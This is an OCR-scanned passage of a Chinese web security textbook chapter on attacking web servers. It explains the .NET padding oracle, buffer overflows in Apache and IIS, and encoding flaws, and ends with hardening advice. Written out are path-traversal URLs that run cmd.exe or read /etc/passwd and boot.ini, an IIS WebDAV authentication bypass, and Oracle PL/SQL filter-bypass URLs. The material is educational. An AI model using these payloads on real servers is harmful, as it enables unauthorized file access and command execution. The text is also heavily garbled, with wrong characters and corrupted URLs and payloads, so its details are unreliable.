处 理 各 种 任务 、 提 供 除 业务 逻辑 本 时 以 外 的 所 有 功能 的 高 度 复杂 的 应 用 程序 平台 。 束 后 者 而 言 ， 
人 们 大 多 认为 这 类 框架 是 安全 的 。 以 前 ，Web 服 务 右 软件 被 一 系列 严重 的 安全 漏洞 所 困扰 ， 使 得 
攻击 者 能 够 执行 任意 代码 、 禄 取 文 件 和 提升 权限 。 这 些 年 来 ， 主 流 Web 服 务 锅 平台 已 变 得 日 渐 可 
靠 。 许 多 情况 下 ， 核 心 功能 仍 保 持 静 态 ， 其 至 经 过 精简 ， 因 为 供应 商 有 章 减 少 默 认 的 受 攻击 面 。 
但 是 ， 即 使 这 些 漏洞 越 来 越 少 ， 其 背后 的 原理 仍然 适用 。 在 本 书 第 1 版 中 ， 我 们 提供 了 一 些 最 有 
可 能 包含 漏洞 的 服务 喜 软 件 示例 。 目 第 1 版 出 版 以 来 ， 人们 在 各 类 软件 〈 通 第 为 并 行 技 术 或 服务 
器 产品 ) 中 均 发 现 了 新 的 漏洞 。 除 一 些小 型 个 人 Web 服 务 需 及 其 他 次 要 目标 外 ,这 些 新 漏洞 大 多 
存在 于 以 下 软件 之 中 : 

DIS 和 Apache 中 的 服务 套 端 扩展。 

口 从 头 开发 的 新 型 Web 服 务 需 , 这 类 服务 器 主要 用 于 文 持 特定 的 应 用 程序 , 或 作为 开发 环境 

的 一 部 分 提供 。 它 们 可 能 较 少 受到 现实 世界 中 的 黑客 的 关注 ， 因 而 更 可 能 存在 上 述 问题 。 


18.2.1 ”应 用 程序 框 染 缺陷 


多 年 以 来 ，Web 应 用 程序 框架 一 下 存在 各 种 严重 的 缺陷 。 我 们 将 介绍 最 近 在 某 个 框架 中 发 现 
的 一 个 凋 见 缺陷 ， 这 个 缺陷 导致 在 该 框架 上 运行 的 许多 应 用 程序 都 多 于 妥 到 攻击 。 

.NET 填 充 提示 

.NET 中 的 “填充 提示 ”( padding oracle ) 漏洞 是 近年 来 最 为 著名 的 漏洞 。.NET 对 CBC 分 组 密 
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码 使 用 PKCS #5 填充 ， 其 操作 方式 如 下 。 

分 组 密码 基于 固定 的 分 组 大 小 进行 操作 ， 在 .NET 中 ， 这 样 的 分 组 通常 为 8 或 16 字 节 。.NET 采 
用 PKCS #7 标准 为 每 一 个 明文 字符 串 添加 填充 字 市 ， 以 确保 生成 的 明文 字符 串 长 度 可 以 被 分 组 大 
小 整除 。 这 时 ，.NET 不 是 使 用 任意 值 进行 填充 ， 选 择 用 于 填充 的 值 是 填充 字 市 的 数量 。 每 个 字 
符 串 都 会 被 填充， 如 果 初 始 字符 串 是 分 组 大 小 的 倍数 ,将 填充 整个 分 组 。 因 此 ， 如 果 分 组 大 小 为 
8， 则 必须 使 用 1 个 0x01 宇 节 、2 个 0x02 字 节 ， 或 最 多 8 个 0x08 字 下 的 任意 组 合 进行 填充 。 然 后 ,将 
第 一 条 消息 的 明文 与 称 为 初始 化 向 量 (IV ) 的 预 设 消息 分 组 进行 XOR 运 算 。( 回顾 我 们 在 第 7 章 讨 
论 的 在 密 文中 选择 模式 时 遇 到 的 问题 。) 如 第 7 章 所 述 ,， 接 下 来 ,第 二 条 消息 将 与 第 一 条 消息 的 密 
文 进行 XOR 运 算 ， 从 而 开始 循环 分 组 链 。 

整个 NET 加 密 过 程 如 下 。 

(1) 选择 明文 消息 。 

(2) 使 用 所 需 的 填充 字符 数 作为 填充 字 节 信 填 充 该 消息 。 

(3) 将 第 一 个 明文 分 组 与 初始 化 回 量 进行 XOR 运 算 。 

(4) 使 用 三 重 DES 加 密 从 第 3 步 的 XOR 运 算得 到 的 值 。 

从 这 时 开始 , 将 循环 执行 以 下 步骤 , 以 加 密 剩 余 的 消息 ( 这 就 是 第 7 草 介绍 的 密码 块 链 ( CBC ) 
过 程 )。 

(5) 将 第 二 个 明文 分 组 与 加 密 后 的 前 一 个 分 组 进行 XOR 运 算 。 

(6) 使 用 三 重 DES 加 密 XOR 运 算得 到 的 值 。 

enU0U0D0 

在 2010 年 9 月 之 前 ， 易 受 攻击 的 .NET 版 本 包含 一 个 看 似 无 害 的 信息 泄露 漏洞 。 如 果 在 消息 中 
发 现 填 充 错误 ， 应 用 程序 会 报告 错误 ， 向 用 户 返 回 500 HTTP 响 应 码 。 如 下 所 述 ， 组 合 利 用 PKCS 
#5 填充 算法 和 CBC 的 上 述 行为 ， 攻 击 者 可 以 攻破 整个 .NET 安 全 机 制 。 

请 注意 ,为 了 发 挥 效 用 ， 所 有 明文 字符 串 应 包含 至 少 一 字 市 的 填充 信息 。 此 外 还 要 注意 ,看 
到 的 第 一 个 密 文 分 组 为 初始 化 向 量 ; 该 向 量 的 唯一 用 途 , 是 与 消息 的 第 一 个 加 密 分 组 的 明文 值 进 
行 XOR 运 算 。 为 实施 攻击 , 攻击 者 将 回应 用 程序 提交 一 个 仪 包含 前 两 个 密 文 分 组 的 字符 串 。 这 两 
个 分 组 分 别 为 IV 及 第 一 个 密 文 分 组 。 然后 , 攻击 者 提 交 一 个 仅 包 含 数 字 零 的 IV,， 并 通过 逐步 递增 
该 IV 的 最 后 一 个 字 节 , 提出 一 系列 请 求 。 该 字 节 将 与 密 文 中 的 最 后 一 个 字 市 进行 XOR 运 算 , 除非 
针对 该 字 节 生成 的 值 为 0x01， 否 则 加 密 算 法 将 抛 出 错误 ! ( 前面 我 们 讲 过 ， 任 何 字 符 串 的 明文 值 
必须 以 一 个 或 多 个 填充 值 结尾 。 由 于 第 一 个 密 文 分 组 中 不 存在 任何 其 他 填充 值 ， 因此 最 后 一 个 值 
必定 被 加 密 为 0x01。 ) 

攻击 者 可 以 利用 以 下 错误 条 件 一 一 最 终 他 会 得 到 这 样 的 值 : 如 果 将 该 值 与 密 文 分 组 的 最 后 一 
个 字 市 进行 XOR 运 算 ， 结果 为 0x01。 这 时 ， 将 可 以 确定 最 后 一 个 字 节 y 的 明文 值 ， 因 为 : 

x XOR YW Ss Ox01 
因此 ， 我 们 也 由 此 确定 x 的 值 。 

以 上 过 程 同样 适用 于 密 文中 的 倒数 第 二 个 字 节 。 这 次 , 在 已 知 y 值 的 情况 下 , 攻击 者 将 选择 x 
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的 值 〈 该 值 的 最 后 一 个 字 节 将 解密 为 0x02 )。 然 后 ， 他 对 初始 化 回 量 中 的 倒数 第 二 个 字符 执行 以 
上 递归 过 程 ， 并 收 到 500 Internal Server Error 消 肯 ， 直 到 倒数 第 二 个 解密 的 字 市 为 0x02。 这 时 ， 消 
县 未 尾 存在 两 个 0x02 字 人 ， 这 是 有 效 的 填充 ， 因 而 不 会 返回 任何 错误 。 然 后 ,可 以 对 目标 分 组 中 
的 所 有 数据 位 、 随 后 的 密 文 分 组 ， 以 及 消息 中 的 所 有 分 组 递归 应 用 同样 的 过 程 。 

这 样 ， 攻 击 者 即 可 以 解密 整 条 消息 。 有 趣 的 是 ， 攻 击 者 还 可 以 采用 同样 的 机 制 来 加 蜜 消息 。 
恢复 一 个 明文 字符 串 后 ， 就 可 以 修改 TV 来 后 成 所 选 的 明文 字符 串 。ScriptResource.axd 是 一 个 最 佳 
攻击 目标 。ScriptResource 的 gd 参数 是 一 个 加 密 的 文件 名 。 如 果 攻 击 者 选择 web.config 作 为 文件 
名 , 将 能 够 获得 具体 的 文件 , 因为 ASPNET 会 避 开 IS 实 施 的 有 关 文 件 处 理 方面 的 稼 规 限 制 。 例 如 : 

https://mAsec.net/ScriptResource.axd?d=SbXSD3uTnhYsKA4gMD8fL84 mHPCSjJJ71f 

Anr1l WtsftZiUOZ6IXYG8QCXW86UizFO&t=632768953157700078 
































注解 ”一 般 而 言 ， 以 上 攻击 适用 于 任何 使 用 PKCS #5 填充 的 CBC 密 码 。 此 类 攻击 最 初 
于 2002 年 为 人 们 所 知 ， 它 的 主要 目标 为 .NET， 因 为 .NET 对 会 话 令 牌 、ViewState 和 
ScriptResource.axd 使 用 PKCS 扰 填 充 。 请 访问 wwwo.iacr.org/archive/eurocrypt2002/ 
23320530/cbc02 e02d.pdf 查 阅 讨 论 这 种 攻击 的 原始 论文 。 


> 


告 通常 ， 人 们 并 不 认真 看 待 “ 绝 不 要 公开 自己 的 加 密 算法 ”这 和 句 话 。 然 而 ， 第 7 
介绍 的 位 翻转 攻击 和 上 述 填充 提示 攻击 均 表明 ， 任 何 微不足道 的 漏洞 都 可 能 导致 非 
党 可 怕 的 后 果 。 因 此 ， 绝 不 要 公开 自己 的 加 密 算 法 。 








党 试 访 问 


http://mdsec.net/private/ 


18.2.2 ”内 存 管 理 漏洞 


由 于 攻击 者 可 以 利用 绥 神 区 溢出 控制 多 受 攻 击 的 进程 , 因此 , 这 种 漏洞 是 影响 各 种 软件 的 最 
严重 的 漏洞 〈 请 参阅 第 16 章 了 解 相 关内 容 )。 如 果 攻 击 者 能 够 在 Web 服 务 顺 中 执行 任意 代码 ， 他 
就 能 攻破 其 中 运行 的 任何 应 用 程序 。 

下 面 仪 介绍 少数 几 种 Web 服 务 融 绥 冲 区 溢出 漏洞 ; 但 这 足以 证 明 这 种 漏洞 的 普 过 性 ， 它 存在 
于 大 量 Web 服 务 天 产品 与 组 件 中 。 

1. Apache mod isapij 悬 挂 指针 

2010 年 ， 人 们 发 现 了 一 个 漏洞 。 如 末 Apache 中 存在 该 漏洞 ,在 遇 到 错误 时 ， 系 统 将 强制 从 内 
存 中 到 载 mod isapi。 不 过 ， 对 应 的 孔 数 指针 仍 保留 在 内 存 中 ， 并 且 可 以 在 引用 相应 的 ISAPI 也 数 
时 被 调用 ， 从 而 访问 内 存 的 任意 部 分 。 














508 第 18 间 攻击 Web 服 务 器 


有 关 此 漏洞 的 详细 信息 ， 请 访问 : www.senseofsecurity.com.au/advisories/SOS-10-002。 

2. Microsoft IIS ISAPI 扩 展 

Microsoft IIS 4 与 5 包含 一 系列 默认 激活 的 ISAPI 扩 展 。2001 年 ， 人 们 发 现 其 中 几 个 扩展 存 
在 绥 冲 区 溢出 漏洞 ， 包 括 Internet Printing Protocol 扩 展 与 Index Server 扩 展 。 这 些 漏洞 使 攻击 者 
能 够 在 Local System 权限 下 执行 任意 代码 , 进而 完全 控制 整个 计算 机 , 并 以 此 为 基础 传播 Nimda 
与 Code Red 蠕 虫 ，, 随后 将 它们 迅速 扩散 。 下 面 的 Microsoft TechNet 公 告 牌 详细 说 明了 这 些 漏洞 : 

U www.microsoft.com/technet/security/bulletin/MSO1-023.mspx; 





UU www.microsott.com/technet/security/bulletm/MSO1-033.mspx。 

全 几 避 加 日 

2008 年 ， 人 们 在 IPP 服 务 中 发 现 了 另 一 个 漏洞 。 这 次 ， 部 署 到 Windows 2003 和 Windows 2008 
上 的 大 多 数 IIS 版 本 都 不 会 立即 受到 攻击 ， 因 为 这 些 系 统 默 认 禁 用 该 扩展 。 请 访问 
www.microsoft.com/technet/security/bulletin/ms08-062.mspx 人 查看 Microsoft 发 布 的 相关 建议 。 

3. Apache 分 块 编码 溢出 

2002 年 ， 人 们 在 Apache Web 服 务 天 中 发 现 一 个 由 整数 符号 错误 导致 的 缓冲 区 游 出 漏洞 。 存 
在 漏洞 的 代码 被 重复 用 在 许多 其 他 Web 服 务 帝 产品 中 ， 使 这 些 产 品 也 受到 影响 。 详 情 请 访问 
WwWw.Securltyfocus.comybld/3033/dlscusSs。 

e0000 

2010 年 ， 人 们 发 现 Apache 的 mog_proxy 在 处 理 HTTP 响 应 中 的 分 块 编码 时 存在 整数 溢出 。 请 
访问 www.securityfocus.comybid/37966 了 解 有 关 此 漏洞 的 介绍 。 

4. WebDAV 洪 出 

2003 年 ， 人 们 发 现 Windows 操作 系统 的 一 个 核心 组 件 中 存在 绥 冲 区 溢出 漏洞 。 这 个 漏洞 可 被 
各 种 攻击 回 量 利用 ， 对 许多 客户 而 言 ， 其 中 最 重要 的 是 IIS 5 内 置 的 WebDAV 文 持 。 在 修复 之 前 ， 
这 个 漏洞 曾 被 攻击 者 广泛 利用 。 欲 知 该 漏洞 的 详情 ， 请 访问 www.microsoft.comy/technetsecurity/ 
bullettn/MS03-007.mSspX。 

SE 

实施 WebDAV 导 致 一 系列 Web 服 务 奉 出 现 漏洞 。 

2009 年 ， 人 们 发 现 Apache 的 mod_aav 扩 展 存在 另 一 个 缓冲 区 深 出 漏洞 。 欲 知 有 关 详 情 ， 请 访 
ajhttp://cve.mitre.org/cgi-bin/cvename.cgi ?name=CVE-2010-1452。 

2010 年 ， 人 们 发 现 ，oPTIONS 请 求 中 的 超 长 路 径 会 导致 Sun 公 司 的 Java System Web Server 出 
现 洲 出 。 有 关 此 漏洞 的 详情 ， 请 访问 www.exploit-db.com/exploits/14287/。 




















18.2.3 ”编码 与 规范 化 漏 油 


如 第 3 章 所 述 ， 我 们 可 以 使 用 各 种 编码 方案 对 不 常见 的 字符 和 内 容 进行 编码 ， 以 方便 通过 
HTTP 安 全 传送 。 如 果 Web 应 用 程序 中 存在 几 种 类 型 的 漏洞 ， 攻 击 者 就 可 以 利用 这 些 编码 方案 避 
开 输 入 确认 检查 ， 实 施 其 他 攻击 。 
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许多 Web 服 务 器 软件 中 都 存在 编码 漏洞 ， 如 果 用 户 提交 的 相同 数据 被 使 用 各 种 技术 的 几 个 保 
护 层 处 理 ， 编 码 漏洞 就 会 造成 严重 的 威胁 。 一 个 盘 型 的 Web 请 求 可 能 被 Web 服 务 杭 、 应 用 程序 平 
侣 、 各 种 托管 导 非 托管 API、 其 他 软件 组 件 与 基础 操作 系统 处 理 。 如 条 不 同 的 组 件 以 不 同 的 方式 
执行 一 种 编码 方案 ,或 者 对 部 分 编码 的 数据 进行 其 他 解码 或 注释 , 那么 攻击 者 就 可 以 利用 这 种 行 
为 避 开 过 滤 或 造成 其 他 反常 行为 。 

路 径 裔 历 是 可 通过 规范 化 缺陷 加 以 利用 的 最 常见 漏洞 之 一 , 因为 它 总 是 涉及 与 操作 系统 的 通 
信 。 在 第 10 章 中 ， 我 们 介绍 了 Web 应 用 程序 中 的 路 径 遍 历 漏洞 。 各 种 Web 服 务 右 软件 中 也 可 能 存 
在 这 种 类 型 的 漏洞 ， 导 致 攻击 者 能 够 谈 取 或 写 人 Web 根 目录 以 外 的 任何 文件 。 

1. Apple iDisk Server 路 径 遍 历 

Apple iDisk Server 是 一 项 流行 的 云 同 步 存 储 服务 。2009 年 ，Jeremy Richards 发 现 其 易于 受到 
路 径 届 历 攻 击 。 

iDisk 用 户 的 目录 结构 中 包含 一 个 公共 目录 ， 该 目录 的 内 容 可 由 未 授权 的 互联 网 用 户 访问 。 
Richards 发 现 ， 通 过 使 用 Unicode 字 符 从 该 公共 文件 夹 届 历来 访问 私有 文件 ， 即 可 从 用 户 的 iDisk 
的 私有 部 分 获取 任意 内 容 ， 如 下 所 未: 

httip://idisk.mac.com/Jeremy.richards-Public/%2FE%2ES2FPRIVATE.txt?disposition= 

download+8300 


此 外 ， 还 可 以 首先 提出 WebDAV PROPFIND 请 求 来 列 出 iDisk 的 内 容 : 


POST /Jeremy.richards-Public/<strong>%®%2E%2E%2F/<strong>?webdav-method= 
PROPF LIND 
























































2. Ruby WEBrick Web 服 务 器 

WEBrick 是 一 个 作为 Ruby 的 一 部 分 提供 的 Web 服 务 硕 。 人 们 发 现 该 服务 磊 易 于 受到 以 下 简单 
形式 的 过 历 攻击 : 

http://[server]: [port]/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot. ini 
欲 知 该 漏洞 的 详情 ， 请 访问 www.securityfocus.comybid/28123 。 

3. Java Web 服 务 器 目录 遍历 

此 路 径 遍 历 漏洞 源 于 VM 并 不 解码 UTF-8 这 一 事实 。Tomcat 即 是 一 种 以 Java 编 写 并 使 用 易 受 
攻击 的 JVM 版 本 的 Web 服 务 顺 。 使 用 UTF-8 编 码 的 . . /序列 可 从 中 检索 任意 内 容 : 

http://www.target .com/%ScO%aescO%ae/ScOsaescOsae/scOsaesc0sae/etc/passwd 
欲 知 该 漏洞 的 详情 ， 请 访问 http:/tomcat.apache.org/security-6.html。 

4. Allaire JRun 目 录 列 表 漏 洞 

2001 年 ， 人 们 在 Allaire JRun 中 发 现 一 个 漏洞 ， 即 使 目录 中 包含 index.html 之 类 的 默认 文件 ， 
攻击 者 仍然 可 以 利用 这 个 漏洞 获取 目录 列表 。 攻 击 者 可 以 使 用 以 下 形式 的 URL 获 取 目 录 列 表 : 

https://wahh-app.com/dir/%3f.jsp 

%3f 是 问号 的 URL 编 码 形式 ， 它 常用 在 查询 字符 串 的 开始 部 分 。 汤 洞 之 所 以 产生 ， 是 因为 最 
初 URL 解 析 融 并 未 将 8s3f 解 释 为 查询 字符 串 指 示 符 。 因 此 ,服务 融 认 为 URL 以 jsp 结尾 , 将 请 求 提 
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交 给 负责 JSP 文 件 请 求 的 组 件 处 理 。 然 后 ， 这 个 组 件 对 %3f 进 行 解码 ， 把 它 解释 为 查询 字符 串 的 
开始 部 分 ， 并 发 现 得 到 的 基础 URL 不 是 一 个 JSP 文 件 ， 于 是 它 返 回 目录 列表 。 欲 知 详情 ， 请 访问 
www.securityfocus.com/b1d/3592,。 

® [00 

2009 年 ， 人 们 发 现 , 在 目录 名 以 问号 结尾 时 ，Jetty 中 存在 一 个 目录 遍历 相关 的 类 似 低 风 险 涯 
洞 。 要 解决 此 漏洞 , 需要 将 ? 编码 为 63£。 欲 知 详情 , 请 访问 https://www.kb.cert.org/vuls/id/402580。 

5. Microsoft IIS Unicode 路 径 人 遍历 漏洞 

Microsoft IIS 服务 需 中 的 两 个 相关 漏洞 分 别 于 2000 年 与 2001 年 被 发 现 。 为 防止 路 径 遍 历 攻 击 ， 
IIS 在 包含 点 -点 - 斜 线 序列 的 请 求 中 查找 它 的 字面 量 与 URL 编 码 形式 。 如 采 某 个 请 求 中 没有 这 些 
表达 式 ，IIS 服务 春 就 会 接受 这 个 请 求 ， 然 后 做 进一步 处 理 。 但 是 ， 接 下 来 ， 服 务 右 对 被 请 求 的 
URL 进 行 了 额外 的 规范 化 处 理 ， 使 得 攻击 者 能 够 避 开 过 泪 ， 让 服务 硕 处 理 志 历 序列 。 

在 第 一 个 漏洞 中 ， 攻 击 着 可 以 提 区 点 -点 -和 斜 线 序列 的 各 种 非法 Unicode 编 但 形式 ， 
如 ..%c0%af。 这 个 表达 式 与 1S 的 前 沿 过 滤 磊 ( upfront filter ) 并 不 匹配 ,但 随后 的 处 理 过 程 接 受 
这 种 非法 编码 , 并 将 它 转换 成 一 个 字面 量 遍 历 序列 。 这 使 攻击 者 能 够 侵入 Web 根 目录 以 外 的 目录 ， 
并 使 用 下 面 的 URL 执 行 任意 命令 : 


htitps://wahh-app.com/scripts/..%cO%af. .ScO%af. .ScO%Saf. .%cO%af. .ScO%af../ 



































winnt/system32/cmd.exe?/ctdirtc:\ 

在 第 二 个 漏洞 中 ,攻击 者 可 以 提交 点 -点 -和 料 线 序列 的 双重 编码 形式 ， 如. .%255c。 同 样 ， 这 
个 表达 式 也 与 JS 的 过 滤 规 不 相 匹配 ， 但 随后 的 处 理 过 程 对 输入 进行 “过 剩 解 伽 ”( superfluous 
decode )， 因 而 将 其 转换 成 一 个 字面 量 过 历 序 列 。 这 样 ， 攻 击 考 就 可 以 使 用 下 面 的 URL 实 施 另 一 
次 攻击 : 


https://wahh-app.com/scripts/..%255c..%255c. .%255c. .525595C.、.$%255cC .。 
S255cwinnt/system32/cmd.exe?/c+i+dirti+c:\ 


欲 知 这 些 漏洞 的 详情 ， 请 访问 : 

QU www.mlicrosoft.comytechnet/securltybujlettnmMS00-078.mSspX 

QU www.microsott.com/technet/security/bulletm/MSO1-026.mspx 

SO 

2009 年 ， 人 们 又 在 WebDAV 中 发 现 类 似 的 IIS 漏 洞 ， 这 说 明 Web 服 务 帮 软件 中 的 编码 与 规范 化 
漏洞 始终 是 一 个 安全 隐患 。 受 IIS 保 护 的 文件 可 以 通过 在 URL 中 插入 恶意 sc0%$af 字 符 串 进行 下 载 。 
由 于 以 下 请 求 看 起 来 并 不 是 一 个 针对 受 保护 文件 的 请 求 ，ISS 会 授权 其 访问 相关 资源 的 权限 ,但 
恶意 字符 串 随 后 会 从 请 求 中 删除 : 

GET /prote%c0O%afcted/protected.zip HTTP/1.1 

Translate: ff 




















Connection: clogse 


Host: wahh-app.net 
Translate: f 消 息 头 用 于 确保 该 请 求 会 由 WebDAV 扩 展 处 理 。 使 用 以 下 代码 可 以 在 WebDAV 
请 求 中 下 接 实 施 相 同 的 攻击 : 
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PROPFIND /protec%cO%afted/ HITTP/1.1 
Host: wahh-app.net 

User-Agent: neo/0.12.2 

Connection: TE 

TE: trailers 

Depth: 1 

Content-Length: 288 

Content-Type: application/xml 

<?xm] version="1.0" encoding="utf-8"?> 
<propfind xmlns="DAV: "><pProp> 
<dqetcontentlength xmlns="DAV:"/> 
<gqetlastmodified xmlns="DAV:"/> 
<executable xmlns="http://apache.org/dav/props/'"/> 





<resourcetype xmlns="DAV:"/> 
<checked-in xmlns="DAV:'"/> 
<checked-out xmlns="DAV:'"/> 


</prop></propfind> 
欲 知 详情 ， 请 访问 www.securityfocus.comy/bid/34993/。 
6. 避 开 Oracle PL/SQL 排 除 列表 
前 面 我 们 提 到 ， 可 通过 Oracle 的 PL/SQL 了 网 关 访 问 危 险 默认 功能 。 为 解决 这 个 问题 ，Oracle 创 
建 了 PL/SQL 排 除 列 表 (Exclusion List )， 它 阻止 攻击 者 访问 以 某 些 表达 式 ( 如 owA 与 SYs ) 开头 
的 包 。 
2001 ~ 2007 年 以 来 , David Litchfield 发 现 了 一 系列 避 开 PL/SQL 排 除 列表 的 方法 。 在 第 一 个 汤 
润 中 ， 在 包 和 名 称 前 插入 空 日 从 ( 如 换行 从、 空格 或 制 表 符 ) 即 可 避 开 过 泪 。 例 如 : 
https://wahh-app.com/pls/dad/%0ASYS .package .procedure 
这 个 URL 可 避 开 过 滤 ， 由 于 后 并 数 据 库 忽略 空 昌 符 ， 因 此 危险 的 包 得 以 执行 。 
在 第 二 个 漏洞 中 ， 用 代表 字符 y 的 sFF 蔡 代 字 母 Y， 即 可 避 开 过 滤 : 
https://wahh-app.com/pls/dad/S%FFS.package.procedure 
这 个 URL 可 避 开 过 滤 ， 后 端 数据 库 对 字符 进行 规范 化 处 理 ， 将 其 恢复 到 标准 的 字母 Y， 从 而 调用 
危险 的 包 。 
在 第 三 个 漏洞 中 ， 用 双 3 引 号 包含 一 个 被 阻止 的 表达 式 即 可 避 开 过 小 : 
https://wahh-app.com/pls/dad/ "SYS'".package.procedure 
这 个 URL 可 避 开 过 小， 后 问 数 据 库 接受 被 引用 的 包 名 称 ， 意 味 者 它 可 调用 危险 的 包 。 
在 第 四 个 漏洞 中 ， 使 用 尖 括 号 在 被 阻止 的 表达 式 前 放置 一 个 编程 的 goto 标 签 ， 即 可 避 开 
过 小 : 
https://wahh-app.com/pls/dad/<<FOO>>SYS .package.procedure 
这 个 URL 可 避 开 过 滤 ， 后 端 数据 库 忽略 goto 标 签 ， 使 得 危险 的 包 得 以 执行 。 
由 于 前 端 过 滤 巾 一 个 组 件 根 据 简 单 的 文本 模 陈 匹配 执行 , 而 随后 的 处 理 过 程 却 由 男 一 个 组 件 
执行 , 并且 它们 按照 目 己 的 规则 解释 输入 的 句法 与 语法 意义 ,因而 造成 了 以 上 各 种 漏洞 。 这 两 组 
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规则 之 间 的 任何 差异 都 可 能 会 被 攻击 者 利用 , 提交 与 过 滤 需 所 使 用 的 模式 不 相 匹配 的 输入 , 但 数 
据 库 却 按 攻击 者 希望 的 方式 解释 这 个 输入 ， 调 用 危险 的 包 。 由 于 Oracle 数据 库 的 功能 极其 强大 ， 
因而 这 种 差异 大 量 存在 。 

欲 知 这 些 漏洞 的 详情 ， 请 访问 : 

UD www.securityfocus.com/archive/1/423819/100/0/threaded 

口 The Oracle Hacker’x Handbook， 作 者 David Litchfield ( Wiley，2007 ) 

elUUU 

2008 年 ， 人 们 在 Portal Server ( Oracle Application Server 的 一 部 分 ) 中 发 现 一 个 漏洞 : 如果 攻 

击 者 具有 以 $0A 结 尾 的 会 话 ID cookie 值 ， 就 可 以 避 开 “基本 验证 ”检查 。 








18.2.4 ”查找 Web 服 务 器 漏洞 


如 末 运 气 不 错 的 话 ， 有 的 渗透 测试 员 会 在 所 针对 的 Web 服 务 硕 中 找到 本 章 描 述 的 一 些 漏 洞 。 
然而 ,它们 很 可 能 已 经 升级 到 了 最 新 的 版 本 ,渗透 测试 员 需 要 查找 一 些 当 前 或 最 新 的 漏洞 ， 利 用 
它们 攻击 服务 益 。 

在 Web 服 务 右 等 非 定制 产品 中 查找 漏洞 时 ， 使 用 上 自动 化 扫描 工具 是 一 个 不 错 的 起 点 。 与 Web 
应 用 程序 这 些 定制 产品 不 同 ， 几 乎 所 有 的 Web 服 务 融 都 使 用 第 三 方 软件 , 并且 有 无 数 用 户 已 经 以 
相同 的 方式 安装 和 配置 了 这 些 软件 。 在 这 种 情况 下 , 使 用 自动 化 扫描 旧 发 送 大 量 专 门 设计 的 请 求 
并 监控 表示 已 知 漏洞 的 签名 ， 就 可 以 迅速 、 高 效 地 确定 最 明显 的 漏洞 。Nessus 是 一 款 非常 不 错 的 
免费 漏洞 扫 拉 器， 当然 也 可 以 使 用 各 种 商业 扫描 融 。 

除 使 用 扫描 工具 外 , 渗透 测试 员 还 应 始终 对 所 攻击 的 软件 进行 深入 人 研究 。 同时, 浏览 Security 
Focus、OSVDB、 邮 件 列 表 Bugtraq 和 Full Disclosure 等 资源 ， 在 目标 软件 上 和 查找 所 有 最 近 发 现 的 、 
尚未 修复 的 漏洞 信息 。 同 时 ， 别 忘记 查看 Exploit Database 和 Metasploit， 看 看 是 不 是 有 人 已 经 做 了 
相关 工作 ， 并 发 现 了 相应 的 漏洞 。 下 面 的 网 址 或 许 能 帮 到 你 : 


口 www.exploit-db.com 





























口 www.metasploit.com/ 

DQ www.grok.org.uk/full-disclosure/ 

DQ http://osvdb.org/search/advsearch 

还 要 注意 ,一些 Web 应 用 程序 产品 中 内 置 了 开源 Web 服 务 郁 ， 如 Apache 或 Jetty。 因 为 管理 员 
把 服务 硕 看 作 他 们 所 安 猴 的 应 用 程序 ， 而 不 是 他 们 负责 的 基础 殿 构 的 一 部 分 ， 所 以 这 些 捆绑 服 
务 仙 的 安全 更 新 也 应 用 得 相对 较为 缓慢 。 而 且 ， 在 这 种 情况 下 ， 标 准 的 服务 标题 也 已 被 修改 。 
因此 ， 对 所 针对 的 软件 进行 手动 测试 与 研究 ， 可 以 非常 有 效 地 确定 目 动 化 扫描 工具 无 法 发 现 的 
漏洞 。 

如 有 可 能 ,渗透 测试 员 应 该 考虑 在 本 地 安 狠 所 攻击 的 软件 , 并 目 己 进行 测试 ,查找 任何 尚未 
发 现 的 新 漏洞 或 广泛 流传 的 漏洞 。 
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18.2.5 ”保障 Web 服 务 器 软件 的 安全 


从 某 种 程度 上 讲 ， 部 署 第 三 方 Web 服 务 右 产品 的 组 织 的 命运 掌握 在 软件 供应 商 手 中 。 然 而 ， 
具有 安全 意识 的 组 织 仍然 可 以 采取 大 量 有 用 的 措施 保护 目 己 ， 避 开本 音 描 述 的 各 种 软件 漏洞 。 
1. 选择 记录 民 好 的 软件 
并 非 所 有 软件 产品 与 供应 商都 提供 同等 优良 的 服务 。 分 析 几 种 不 同 的 服务 器 产品 的 最 近 历史 
可 以 发 现 , 它们 在 存在 的 严重 洗 洞 数量 、 供 应 商 修复 这 些 漏洞 是 否 及 时 以 及 发 布 的 补丁 在 随后 测 
试 过 程 中 表现 的 适应 性 等 方面 存在 明显 的 差异 。 在 选择 部 普 何 种 Web 服 务 硕 软件 之 前 ， 应 该 研究 
这 些 差 异 ， 并 考虑 如 条 所 在 的 组 织 采 用 了 选择 的 软件 ， 它 在 近 几 年 将 会 如 何 运转 。 
2. 应 用 供应 商 发 布 的 补丁 
任何 有 责任 的 软件 供应 商 必 须 定期 发 布 安全 更 新 。 有 时 , 这 些 补 丁 能 够 解决 供应 商 目 身 在 内 
部 发 现 的 问题 ; 其 他 情况 下 ， 软 件 问题 由 专门 的 研究 员 上 报 , 但 我 们 无 法 确定 他 是 否 保留 了 一 些 
言 县 。 其 他 漏洞 因为 被 攻击 者 广泛 利用 , 因而 引起 供应 商 的 注意 。 但 是 , 无 论 是 上 述 哪 一 种 情况 ， 
一 旦 供应 商 发 布 补丁 , 任何 强大 的 逆 回 工程 方法 都 能 立即 查 明 它 所 解决 的 问题 所 在 , 使 攻击 者 能 
够 着手 设计 利用 这 个 问题 的 攻击 。 因 此 ， 如 采 可 行 ， 应 尽 可 能 及 时 地 应 用 安全 补丁 。 
3. 实施 安全 强化 
大 多 数 Web 服 务 硕 都 拥有 大 量 的 配置 选项 ,可 控制 在 其 中 激活 哪些 功能 ， 同 时 控制 它们 的 运 
行 状态 。 如 末 无 用 的 功能 ( 如 默认 ISAPI 扩 展 ) 仍然 被 激活 ， 那 么 只 要 攻击 者 在 这 项 功能 中 发 现 
新 的 漏洞 ， 服 务 硕 就 会 受到 严重 的 攻击 威胁 。 用 户 应 该 查阅 与 所 使 用 的 软件 有 关 的 强化 指南 ， 同 
时 还 应 考虑 采用 以 下 这 些 并 用 的 强化 步骤 。 
口 蔡 用 任何 不 需要 的 内 置 功能 ， 配 置 剩 下 的 功能 尽 可 能 严格 地 运行 ， 与 商业 需求 保持 一 致 。 
这 包括 删除 映射 的 文件 扩展 名 、Web 服 务 硕 模块 和 数据 库 组 件 。 可 以 使 用 IIS Lockdown 等 
工具 迅速 完成 这 项 任务 。 
口 如 于 应 用 程序 由 任何 其 他 以 本 地 代码 开发 的 定制 服务 需 扩 展 组 成 ， 则 应 考虑 是 否 可 以 使 
